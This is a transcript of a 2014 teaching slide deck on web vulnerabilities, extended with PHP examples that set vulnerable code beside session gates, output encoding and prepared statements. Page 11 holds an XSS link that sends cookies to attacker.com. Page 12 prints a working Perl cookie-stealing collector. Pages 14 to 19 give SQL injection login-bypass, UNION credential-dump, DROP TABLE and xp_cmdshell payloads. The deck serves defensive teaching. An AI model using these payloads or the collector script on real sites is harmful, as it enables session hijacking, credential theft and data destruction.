Web Vulnerability, Saharudin Saat (slide deck transcript, posted 14-Nov-2014)

TRANSCRIPT

Page 1: Web Vulnerability

Saharudin Saat

session_start();

Page 2: The most common web vulnerabilities

• No session control (bypasses authentication)

• XSS (cross-site scripting)

• SQL injection

• Default?

Page 3: Session Control

Is this site vulnerable?

Page 4: Session Control

• The user needs to log in before accessing the system.

• Does the code really check the username and password?

• In this case, no login is required: we can bypass the login page just by entering the URL of an internal page directly:

http://localhost/latihan/home.php

Page 5: Session Control

An intruder can bypass your system just by typing the URL of an internal page!

Page 6: Session Control

Recommendation

• Use sessions: call session_start() at the top of every page.

• Every sensitive page must have access-level control, e.g.:

    <?php
    session_start();
    // $level is stored in the session by the login page
    $level = isset($_SESSION['level']) ? $_SESSION['level'] : '';
    if ($level == '1') {
        header("Location: admin_menu.php");
    } else if ($level == '2') {
        header("Location: approve.php");
    } else if ($level == '4') {
        header("Location: report.php");
    } else {
        header("Location: index.php");   // unknown or missing level: back to login
    }
    exit;   // stop here so nothing below the redirect is sent to the client

Page 7: Session Control

    <?php if ($pwd == '') { ?>
    <script language="javascript">
    alert("not authorized!!");
    window.location = "index.php";
    </script>
    <?php exit; } ?>

Check whether a password was entered; if not, redirect to the login page again. Note that the JavaScript redirect only runs in a browser: unless the script also calls exit (or header() before any output), the rest of the page is still sent and can be read with any HTTP client.

Validation must happen on the server side to prevent code injection; client-side checks can be bypassed.

Refer to the file session.php in the e-rent folder.
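The following is an added example and not code from the slides or from the e-rent project: a server-side session gate in PHP (7.1 or later) of the kind pages 6 and 7 recommend, written as a pure decision function so the policy can be checked from the command line. The slides send level '1' to admin_menu.php, '2' to approve.php and '4' to report.php; the rest of the page-to-level table, the file names not_authorized.php and index.php, the stored password hash column and the user records are assumptions made for this example.

```php
<?php
// Added example, not code from the slides: a server-side session gate.
// The page-to-level table, not_authorized.php, index.php and the password
// hash column are assumptions for this example.
declare(strict_types=1);

// Which session levels may open which page. The slides only show that
// level '1' goes to admin_menu.php, '2' to approve.php and '4' to report.php;
// the rest of this table is assumed.
const PAGE_ACCESS = [
    'admin_menu.php' => ['1'],
    'approve.php'    => ['1', '2'],
    'report.php'     => ['1', '4'],
    'home.php'       => ['1', '2', '4'],
];

// Pure decision function so the policy can be checked without a web server.
// Returns null when access is allowed, otherwise the page to redirect to.
function access_decision(array $session, string $page): ?string
{
    // No authenticated user in the session: back to the login page.
    if (empty($session['userid']) || !isset($session['level'])) {
        return 'index.php';
    }
    $allowed = PAGE_ACCESS[$page] ?? [];
    // Logged in, but this level may not open this page.
    if (!in_array((string) $session['level'], $allowed, true)) {
        return 'not_authorized.php';
    }
    return null;
}

// Call this as the first statement of every sensitive page, before any output.
function require_access(string $page): void
{
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    $redirect = access_decision($_SESSION, $page);
    if ($redirect !== null) {
        header('Location: ' . $redirect);
        exit; // without exit, the rest of the page is still sent to the client
    }
}

// Login handler: verify the password server-side against a stored hash,
// regenerate the session id so an id issued before login cannot be reused
// (session fixation), and only then mark the session as logged in.
function login(string $userid, string $password, array $user_row): bool
{
    if ($user_row['userid'] !== $userid
        || !password_verify($password, $user_row['hash'])) {
        return false;
    }
    if (session_status() !== PHP_SESSION_ACTIVE) {
        session_start();
    }
    session_regenerate_id(true);
    $_SESSION['userid'] = $userid;
    $_SESSION['level']  = (string) $user_row['level'];
    return true;
}

// Self-check of the policy (constructed sessions, not real users).
function session_gate_self_test(): bool
{
    $staff = ['userid' => 'ali', 'level' => '4'];
    $admin = ['userid' => 'admin', 'level' => '1'];
    return access_decision([], 'home.php') === 'index.php'            // not logged in
        && access_decision($staff, 'admin_menu.php') === 'not_authorized.php'
        && access_decision($staff, 'report.php') === null
        && access_decision($admin, 'admin_menu.php') === null;
}

if (PHP_SAPI === 'cli') {
    echo session_gate_self_test() ? "session gate checks passed\n" : "session gate checks FAILED\n";
}
```

A page such as home.php then starts with `require 'session_gate.php'; require_access('home.php');` and nothing else before it. Running the file directly with `php session_gate.php` exercises the decision table; the redirect and exit happen only under a web server.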

Page 8: XSS (cross site scripting)

Page 9: XSS (cross site scripting)

• When the code <script>alert("Boleh xss")</script> entered in the username input box is executed, we know that this site is vulnerable to an XSS attack.

• The attacker can then social-engineer victims into clicking a malicious URL that steals their cookies (phishing).

Page 10: XSS (cross site scripting)

Page 11: XSS (cross site scripting)

    <html><head><title>Look at this!</title></head><body>
    <a href="http://hotwired.lycos.com/webmonkey/00/18/index3a_page2.html?tw=<script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>"
       onMouseOver="window.status='http://www.cnn.com/2002/SHOWBIZ/News/05/02/clinton.talkshow.reut/index.html';return true"
       onMouseOut="window.status='';return true">
    Check this CNN story out!</a>
    </body></html>

Page 12: XSS (cross site scripting)

steal.cgi, the script the page-11 link sends the victim's cookie to. The slide shows only the logging and mailing part; the COOKIES log file and the $mailprog path are not on the slide and are assumed here so the script runs:

    #!/usr/bin/perl
    # Assumed setup, not shown on the slide: where to log and how to send mail.
    my $mailprog = '/usr/sbin/sendmail';
    open(COOKIES, '>>', 'cookies.txt') or die "cannot open log: $!";
    # The QUERY_STRING environment variable should be filled with
    # the cookie text after steal.cgi:
    # http://www.attacker.com/steal.cgi?XXXXX
    print COOKIES "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
    close(COOKIES);
    # now email the alert as well so we can start to hijack
    open(MAIL, "|$mailprog -t");
    print MAIL "To: attacker\@attacker.com\n";
    print MAIL "From: cookie_steal\@attacker.com\n";
    print MAIL "Subject: Stolen Cookie Submission\n\n";
    print MAIL "-" x 75 . "\n\n";
    print MAIL "$ENV{'QUERY_STRING'} from $ENV{'REMOTE_ADDR'}\n";
    close(MAIL);

Page 13: XSS (cross site scripting)

Recommendation

• Use POST rather than GET in forms: specify POST in the method attribute of your forms. This is not appropriate for every form, but it is appropriate when a form performs an action, such as buying stocks. In fact, the HTTP specification requires that GET be considered safe, i.e. free of side effects.

• Use $_POST rather than relying on register_globals. Using the POST method for form submissions is useless if you rely on register_globals and reference form variables as $symbol and $quantity. It is equally useless if you read them from $_REQUEST, which merges GET and POST.

• Do not trade security for convenience.
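The page-9 injection and the page-13 recommendation side by side, as an added PHP example (not code from the slides): the username reflection as it is usually written, the same output with HTML encoding, URL-context encoding for a parameter such as the page-11 "tw=", the session-cookie flags that stop document.cookie from reaching steal.cgi, and the POST-only check. The function names, the greeting markup and the form field names are assumptions for this example.

```php
<?php
// Added example, not code from the slides: the page-9 reflection, its fix,
// cookie flags against the page-12 cookie theft, and the page-13 POST rule.
// Function names and markup are assumptions for this example.
declare(strict_types=1);

// Vulnerable: untrusted input is pasted into HTML as-is, so
// <script>alert("Boleh xss")</script> runs in the victim's browser.
function greet_vulnerable(string $username): string
{
    return "<p>Welcome, " . $username . "</p>";
}

// Fixed: HTML-encode every untrusted value at the point of output.
// ENT_QUOTES also encodes ' so the value is safe inside attributes;
// the charset must match the one the page declares.
function greet_safe(string $username): string
{
    $safe = htmlspecialchars($username, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return "<p>Welcome, " . $safe . "</p>";
}

// A value placed inside a URL (the "tw=" parameter on page 11) is a
// different context: it needs urlencode() first, then HTML encoding of
// the whole attribute value.
function link_safe(string $base, string $tw): string
{
    $href = $base . '?tw=' . urlencode($tw);
    return '<a href="' . htmlspecialchars($href, ENT_QUOTES, 'UTF-8') . '">story</a>';
}

// Cookie hygiene: HttpOnly keeps document.cookie (as used by steal.cgi) from
// reading the session cookie; Secure keeps it off plain HTTP; use_only_cookies
// refuses session ids passed in the URL.
function start_hardened_session(): void
{
    ini_set('session.cookie_httponly', '1');
    ini_set('session.cookie_secure', '1');
    ini_set('session.use_only_cookies', '1');
    session_start();
}

// Page-13 rule: a state-changing request must arrive by POST and its
// fields must be read from $_POST, never from $_REQUEST or register_globals.
function is_state_change_allowed(string $method, array $post): bool
{
    return $method === 'POST' && isset($post['symbol'], $post['quantity']);
}

// Self-check with the constructed page-9 payload.
function xss_self_test(): bool
{
    $payload = '<script>alert("Boleh xss")</script>';
    $vuln = greet_vulnerable($payload);
    $safe = greet_safe($payload);
    $link = link_safe('http://example.test/page.html', $payload);
    $order = ['symbol' => 'ABC', 'quantity' => '10'];
    return strpos($vuln, '<script>') !== false        // payload survives verbatim
        && strpos($safe, '<script>') === false        // encoded: &lt;script&gt;
        && strpos($safe, '&lt;script&gt;') !== false
        && strpos($link, '<script>') === false        // %3Cscript%3E in the URL
        && !is_state_change_allowed('GET', $order)
        && is_state_change_allowed('POST', $order);
}

if (PHP_SAPI === 'cli') {
    echo xss_self_test() ? "xss checks passed\n" : "xss checks FAILED\n";
}
```

Encoding is chosen per output context (HTML body, attribute, URL), which is why there are two different functions rather than one global filter; input filtering alone, as on page 20, does not cover a value that is stored now and echoed later.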

Page 14: SQL injection

Simple SQL injection to log in without a valid username and password

Page 15: SQL injection

The attacker is logged in as the first valid user in the login table.

Page 16: SQL injection

• The attacker is lucky if the first row in the login table is an administrator.

• If not, he will want to find the administrator's login and password.

• Can the attacker do that?

Page 17: SQL injection

By inserting a UNION statement in the URL, the attacker can view all logins and passwords.

Page 18: SQL injection

• The original URL looks like this:
http://localhost/latihan/staffdetail.php?nostaf=654321

• The attacker then tries a UNION SELECT to read the usernames and passwords from the administrator table; the URL then looks like this:
http://localhost/latihan/staffdetail.php?nostaf=654321%20union%20select%201,2,userid,katalaluan%20from%20administrator

* Note: %20 is the URL encoding of a space.

Page 19: SQL injection

• Where SQL injection is possible, the attacker may also be able to drop a table by appending a DROP TABLE statement, e.g. the name value a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE ' turns the query into:
SELECT * FROM users WHERE name = 'a';DROP TABLE users; SELECT * FROM DATA WHERE name LIKE '%';

• In some cases (Microsoft SQL Server), the attacker passes "EXEC xp_cmdshell 'dir c:'" as the @query argument and sees the output of "dir c:" in the web page.

Page 20: SQL injection

Recommendation

• Filter your data. This cannot be overstressed: with good data filtering in place, most security concerns are mitigated, and some are practically eliminated.

• Quote your data. If your database allows it (MySQL does), put single quotes around all values in your SQL statements, regardless of the data type.

• Escape your data. Sometimes valid data can unintentionally interfere with the format of the SQL statement itself. Use mysql_real_escape_string() (unlike mysql_escape_string(), it takes the connection's character set into account) or the escaping function native to your particular database. If there isn't one, addslashes() is a last resort only. Better still, use prepared statements (PDO or mysqli), so that values are bound as parameters and never spliced into the SQL text at all.
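The login bypass of pages 14-15 and the staffdetail.php UNION attack of pages 17-18, reproduced as an added PHP example (not code from the slides or the latihan application) against an in-memory SQLite database through PDO, each beside the prepared-statement version that the page-20 recommendation ends with. The table layouts and rows are constructed to match the names on the slides (staff.nostaf, administrator.userid, administrator.katalaluan, login) and are assumptions; it needs PHP 7.1 or later with the pdo_sqlite extension.

```php
<?php
// Added example, not code from the slides: the page-18 UNION attack and the
// page-14 login bypass against a constructed SQLite database, beside the
// prepared-statement fix. Table layouts and rows are assumptions.
declare(strict_types=1);

function setup_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Constructed sample data, not real accounts.
    $db->exec("CREATE TABLE staff (nostaf TEXT, nama TEXT, jabatan TEXT, telefon TEXT)");
    $db->exec("INSERT INTO staff VALUES ('654321', 'Ali', 'Pentadbiran', '1234')");
    $db->exec("CREATE TABLE administrator (userid TEXT, katalaluan TEXT)");
    $db->exec("INSERT INTO administrator VALUES ('admin', 's3cret')");
    $db->exec("CREATE TABLE login (userid TEXT, katalaluan TEXT, level TEXT)");
    $db->exec("INSERT INTO login VALUES ('ali', 'ali123', '4'), ('admin', 's3cret', '1')");
    return $db;
}

// Vulnerable staffdetail.php: the nostaf parameter becomes part of the SQL text,
// so "654321 union select 1,2,userid,katalaluan from administrator" is run as SQL.
function staff_detail_vulnerable(PDO $db, string $nostaf): array
{
    $sql = "SELECT nostaf, nama, jabatan, telefon FROM staff WHERE nostaf = " . $nostaf;
    return $db->query($sql)->fetchAll(PDO::FETCH_NUM);
}

// Fixed: the value travels as a bound parameter and is compared as one string.
function staff_detail_safe(PDO $db, string $nostaf): array
{
    $stmt = $db->prepare("SELECT nostaf, nama, jabatan, telefon FROM staff WHERE nostaf = ?");
    $stmt->execute([$nostaf]);
    return $stmt->fetchAll(PDO::FETCH_NUM);
}

// Vulnerable login (pages 14-15): quoting alone does not help when the
// attacker can close the quote himself.
function login_vulnerable(PDO $db, string $user, string $pass): ?string
{
    $sql = "SELECT userid FROM login WHERE userid = '$user' AND katalaluan = '$pass'";
    $row = $db->query($sql)->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : null;
}

function login_safe(PDO $db, string $user, string $pass): ?string
{
    $stmt = $db->prepare("SELECT userid FROM login WHERE userid = ? AND katalaluan = ?");
    $stmt->execute([$user, $pass]);
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row ? $row[0] : null;
}

function sqli_self_test(): bool
{
    $db = setup_db();
    // The page-18 payload with %20 decoded back to spaces.
    $union = "654321 union select 1,2,userid,katalaluan from administrator";
    $leaked_admin = false;
    foreach (staff_detail_vulnerable($db, $union) as $row) {
        if ($row[2] === 'admin' && $row[3] === 's3cret') {
            $leaked_admin = true;   // administrator credentials in the staff view
        }
    }
    // Bound parameter: no staff row is named like the whole payload, nothing leaks,
    // while the legitimate lookup still works.
    $nothing_leaked = staff_detail_safe($db, $union) === []
        && count(staff_detail_safe($db, '654321')) === 1;
    // Pages 14-15: ' or '1'='1 in both fields logs in as the first login row.
    $inject = "' or '1'='1";
    $bypass  = login_vulnerable($db, $inject, $inject) === 'ali';
    $blocked = login_safe($db, $inject, $inject) === null
        && login_safe($db, 'admin', 's3cret') === 'admin';
    return $leaked_admin && $nothing_leaked && $bypass && $blocked;
}

if (PHP_SAPI === 'cli') {
    echo sqli_self_test() ? "sql injection checks passed\n" : "sql injection checks FAILED\n";
}
```

Run it with `php sqli_demo.php`. The vulnerable staff query deliberately leaves nostaf unquoted, as the page-18 URL implies (the payload works without a closing quote); the vulnerable login quotes its values and is still bypassed, which is why the prepared statement, not the quoting, is the fix.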

Page 21: Default?

Do you realize that other people on the internet can see your default settings?

Page 22: Default?

Pay attention to any alert from third-party software about your web security.

Page 23: Default?

An attacker might browse your server's files to find any useful information.


Page 25

session_destroy();

Thank You